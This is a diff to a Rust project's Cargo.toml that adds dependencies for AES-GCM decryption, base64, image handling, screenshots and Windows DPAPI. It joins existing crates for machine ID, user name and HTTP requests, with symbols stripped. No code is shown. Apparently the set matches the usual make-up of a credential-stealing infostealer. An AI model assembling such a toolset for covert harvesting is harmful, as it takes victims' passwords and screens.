--- a/Cargo.toml
+++ b/Cargo.toml
@@ -4,10 +4,16 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
+aes = "0.8.3"
+aes-gcm = "0.10.2"
+base64 = "0.21.2"
+image = "0.24.6"
 machine-uid = "0.3.0"
 reqwest = { version = "0.11.18", features = ["blocking", "json"] }
+screenshots = "0.6.0"
 serde_json = "1.0.97"
 whoami = "1.4.0"
+winapi = { version = "0.3.9", features = ["winuser", "dpapi"] }
 
 [profile.release]
 strip = true
